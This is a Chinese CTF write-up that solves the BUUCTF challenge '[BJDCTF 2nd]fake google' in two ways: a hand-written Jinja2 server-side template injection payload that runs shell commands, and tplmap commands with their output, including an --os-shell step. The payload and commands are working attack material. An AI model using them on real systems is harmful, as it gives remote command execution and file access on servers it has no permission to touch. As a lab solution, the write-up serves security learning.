记一次tplmap的简单使用案例
Tplmap简介
Tplmap是一个python工具,可以通过使用沙箱转义技术找到代码注入和服务器端模板注入(SSTI)漏洞。该工具能够在许多模板引擎中利用SSTI来访问目标文件或操作系统。一些受支持的模板引擎包括PHP(代码评估),Ruby(代码评估),JaveScript(代码评估),Python(代码评估),ERB,Jinja2和Tornado。该工具可以执行对这些模板引擎的盲注入,并具有执行远程命令的能力。
tplmap安装步骤
在kali打开终端,输入
git clone https://github.com/epinna/tplmap
git clone具体的可以看我这篇博文哦
以上就是我们安装的过程了,接下来拿一道例题来做个使用案例
我们拿BUUCTF来复现,[BJDCTF 2nd]fake google这道题
案例[BJDCTF 2nd]fake google
方法一:手工注
这道题可以手工注,这里直接放一下payload
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()")}}{% endif %}{% endfor %}
模板注入语句解释如下
- {% for c in [].__class__.__base__.__subclasses__() %} //list下遍历
- {% if c.__name__=='catch_warnings' %} //判断目标
- {{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()")}} //拼接
- {% endif %}{% endfor %} //结束循环和判断
方法二:tplmap
使用tplmap工具
在tplmap文件夹下打开终端
键入命令,-u指定url
./tplmap.py -u http://4ed902ae-b677-45c3-a0c1-4c8a88af7f07.node3.buuoj.cn/qaq?name=1
下面是回显信息
root@kali:~/tplmap# ./tplmap.py -u http://4ed902ae-b677-45c3-a0c1-4c8a88af7f07.node3.buuoj.cn/qaq?name=1
[+] Tplmap 0.5
Automatic Server-Side Template Injection Detection and Exploitation Tool
[+] Testing if GET parameter 'name' is injectable
[+] Smarty plugin is testing rendering with tag '*'
[+] Smarty plugin is testing blind injection
[+] Mako plugin is testing rendering with tag '${*}'
[+] Mako plugin is testing blind injection
[+] Python plugin is testing rendering with tag 'str(*)'
[+] Python plugin is testing blind injection
[+] Tornado plugin is testing rendering with tag '{{*}}'
[+] Tornado plugin is testing blind injection
[+] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] Tplmap identified the following injection point:
GET parameter: name
Engine: Jinja2
Injection: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:
Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code
[+] Rerun tplmap providing one of the following options:
--os-shell Run shell on the target
--os-cmd Execute shell commands
--bind-shell PORT Connect to a shell bind to a target port
--reverse-shell HOST PORT Send a shell back to the attacker's port
--upload LOCAL REMOTE Upload files to the server
--download REMOTE LOCAL Download remote files
可以看到是Jinja2模板,同时最下面还提示我们可以使用--os-shell拿shell
./tplmap.py -u http://4ed902ae-b677-45c3-a0c1-4c8a88af7f07.node3.buuoj.cn/qaq?name=1 --engine=Jinja2 --os-shell
在输入完url后,别忘了--engine指定模板
ls ../看下目录,发现有flag,cat /flag即可
拿下!